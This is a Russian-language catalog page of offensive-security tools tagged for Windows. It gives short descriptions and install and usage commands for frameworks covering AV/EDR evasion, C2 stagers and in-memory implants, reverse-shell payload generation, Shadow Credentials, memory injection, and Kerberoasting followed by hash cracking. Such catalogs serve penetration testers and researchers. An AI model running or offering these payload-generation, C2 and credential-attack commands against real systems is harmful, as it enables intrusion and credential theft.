Каталог инструментов

44 инструментов

Тег: windows ×

SysWhispers3

Post-Exploitation

Генератор заголовочных и ассемблерных файлов для прямых системных вызовов Windows, применяется для обхода перехватов AV/EDR на уровне user-mode API.

git clone https://github.com/klezVirus/SysWhispers3.git cd SysWhispers3 python .\syswhispers.py --help

Tsukuyomi

v0.4.2
Exploitation

C2-фреймворк на Rust для Linux x86_64 и Windows x86_64. Реализует staged-доставку: стейджер (Mikazuki) выходит на связь по HTTPS, замещает себя в памяти полным имплантом (Mangetsu), который берёт на …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Tsukuyomi.git cd Tsukuyomi cargo build --release # Запуск (однобинарный лаунчер: поднимает сервер + консоль) ./target/release/tsukuyomi # В консольном REPL: # build stager -- компилирует стейджер (Linux + Windows), запрашивает URL C2 # build implant -- компилирует имплант (Linux + Windows) # build all -- стейджер + имплант # sessions -- список активных сессий # interact 1 -- подключиться к сессии #1 # shell id=1 whoami -- выполнить команду на цели # Схема: стейджер → HTTPS → сервер → замена в памяти → имплант # Имплант остаётся только в RAM; TLS-пиннинг бакается при сборке

Veil

v3.1.14
Exploitation

Фреймворк для генерации payload-ов, обходящих антивирусную защиту. Veil-Evasion создаёт исполняемые файлы для Windows с шифрованием shellcode на различных языках: Python, PowerShell, C, C#. Интегрируется с Metasploit.

# Kali Linux: sudo apt install veil sudo /usr/share/veil/config/setup.sh --force --silent veil # Из исходников: git clone https://github.com/Veil-Framework/Veil cd Veil sudo ./config/setup.sh --force --silent sudo python3 Veil.py # Генерация payload: sudo python3 Veil.py -t Evasion -p python/meterpreter/rev_tcp.py \ --ip 192.168.1.100 --port 4444 -o payload_name

Villain

vV2.2.1
Post-Exploitation

Многосессионный C2-фреймворк для Windows и Linux reverse shell-ов. Генерирует обфусцированные payload-ы для PowerShell, Bash и других шеллов, управляет несколькими сессиями одновременно, поддерживает peer-to-peer связь между teamserver-ами. Лёгкий и …

git clone https://github.com/t3l3machus/Villain cd Villain pip3 install -r requirements.txt # Запуск сервера: sudo python3 Villain.py # Генерация payload (внутри Villain): # villain > generate os=windows lhost=192.168.1.100 obfuscate # villain > generate os=linux lhost=192.168.1.100 # Подключение teamservers: # villain > connect 192.168.1.200 65001

Whisker

Post-Exploitation

C#-инструмент для захвата учётных записей пользователей и компьютеров Active Directory через манипуляцию атрибутом msDS-KeyCredentialLink ('Shadow Credentials').

git clone https://github.com/eladshamir/Whisker.git # Visual Studio: открыть Whisker.sln -> Build # или командная строка: dotnet build Whisker.csproj # Готовый EXE доступен в GitHub Releases

enum4linux-ng

v1.3.10
Reconnaissance

Современная переработка enum4linux на Python — инструмент для перечисления информации с хостов Windows и Samba через протоколы SMB, RPC и LDAP. Незаменим при разведке Active Directory и внутренних …

# pip: pip install enum4linux-ng # или из репозитория: git clone https://github.com/cddmp/enum4linux-ng cd enum4linux-ng pip install -r requirements.txt # Зависимости (для полного функционала): sudo apt install samba-common-bin ldap-utils # Примеры: # Базовое перечисление: enum4linux-ng 192.168.1.10 # С аутентификацией: enum4linux-ng -u administrator -p Password123 192.168.1.10 # Только пользователи и группы: enum4linux-ng -U -G 192.168.1.10 # LDAP + вывод в JSON: enum4linux-ng -oJ result.json -l 192.168.1.10

libmem

v4.1.0
Exploitation

Кросс-платформенная библиотека для манипуляций с памятью процессов (Windows, Linux, macOS, FreeBSD). API: чтение/запись памяти, поиск паттернов (сигнатур), хуки функций через trampoline/detour, инъекция кода и DLL/SO-библиотек, перечисление модулей и …

# Python (pip) pip install libmem # Rust (Cargo.toml) # [dependencies] # libmem = "5" # C/C++ через CMake FetchContent (рекомендуется) # Добавить в CMakeLists.txt: # include(FetchContent) # FetchContent_Declare(libmem-config # URL "https://raw.githubusercontent.com/rdbo/libmem/config-v1/libmem-config.cmake" # DOWNLOAD_NO_EXTRACT TRUE) # FetchContent_MakeAvailable(libmem-config) # target_link_libraries(<TARGET> PRIVATE libmem::libmem) # Python — пример: чтение памяти процесса # import libmem as lm # proc = lm.find_process("target") # mod = lm.find_module_ex(proc, "libssl.so") # data = lm.read_memory_ex(proc, mod.base, 16)
Post-Exploitation

Python-утилита для Kerberoast-атаки с дополнительным механизмом ACL abuse: для пользователей без SPN скрипт пытается временно выставить SPN (используя права на запись в атрибут `servicePrincipalName`), получает Kerberos hash, затем …

git clone https://github.com/p0dalirius/targetedKerberoast cd targetedKerberoast pip install -r requirements.txt # Атака по всем пользователям домена python targetedKerberoast.py \ -d domain.local \ -u user \ -p 'Password123!' \ --dc-ip 192.168.1.101 # Только конкретный пользователь python targetedKerberoast.py -d domain.local -u user -p Pass \ --request-user target_user --dc-ip 192.168.1.101 # Pass-the-hash python targetedKerberoast.py -d domain.local -u user \ -H 'LMHASH:NTHASH' --dc-ip 192.168.1.101 # Kerberos auth (ccache) export KRB5CCNAME=/tmp/user.ccache python targetedKerberoast.py -d domain.local -k --no-pass --dc-ip 192.168.1.101 # Сохранить хеши и взломать python targetedKerberoast.py -d domain.local -u user -p Pass -o hashes.txt hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt